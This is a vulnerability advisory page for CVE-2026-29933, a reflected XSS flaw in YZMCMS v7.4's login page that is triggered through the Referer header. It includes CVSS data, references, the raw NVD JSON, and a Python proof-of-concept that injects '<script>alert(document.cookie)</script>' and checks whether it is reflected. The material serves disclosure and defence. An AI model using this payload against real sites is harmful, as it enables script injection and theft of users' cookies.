CVE-2026-29933

Description

A reflected cross-site scripting (XSS) vulnerability in the /index/login.html component of YZMCMS v7.4 allows attackers to execute arbitrary Javascript in the context of the user's browser via modifying the referrer value in the request header.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:yzmcms:yzmcms:7.4:*:*:*:*:*:*:* - VULNERABLE

YZMCMS v7.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Vulnerable component)
target_url = "http://example.com/index/login.html"

# Malicious payload injected into the Referer header
# The application fails to sanitize this header, leading to XSS
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Referer": "<script>alert(document.cookie)</script>"
}

try:
    # Send GET request with the malicious header
    response = requests.get(target_url, headers=headers)

    # Check if the payload is reflected in the response body
    if "<script>alert(document.cookie)</script>" in response.text:
        print("[+] Vulnerability Confirmed: Reflected XSS via Referer header.")
    else:
        print("[-] Vulnerability not confirmed or payload blocked.")

except Exception as e:
    print(f"[!] Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-29933
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-29933
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-29933/
[4] VulDB https://vuldb.com/cve/CVE-2026-29933
[5] https://github.com/yzmcms/yzmcms/issues/69
[6] https://github.com/yzmcms/yzmcms/issues/69

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-29933", "sourceIdentifier": "[email protected]", "published": "2026-03-26T15:16:35.890", "lastModified": "2026-03-31T21:38:24.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected cross-site scripting (XSS) vulnerability in the /index/login.html component of YZMCMS v7.4 allows attackers to execute arbitrary Javascript in the context of the user's browser via modifying the referrer value in the request header."}, {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting (XSS) reflejada en el componente /index/login.html de YZMCMS v7.4 permite a los atacantes ejecutar Javascript arbitrario en el contexto del navegador del usuario mediante la modificación del valor del referrer en la cabecera de la solicitud."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:yzmcms:yzmcms:7.4:*:*:*:*:*:*:*", "matchCriteriaId": "A6242988-038F-490C-BF15-892EA56E7ACA"}]}]}], "references": [{"url": "https://github.com/yzmcms/yzmcms/issues/69", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/yzmcms/yzmcms/issues/69", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Mitigation", "Vendor Advisory"]}]}}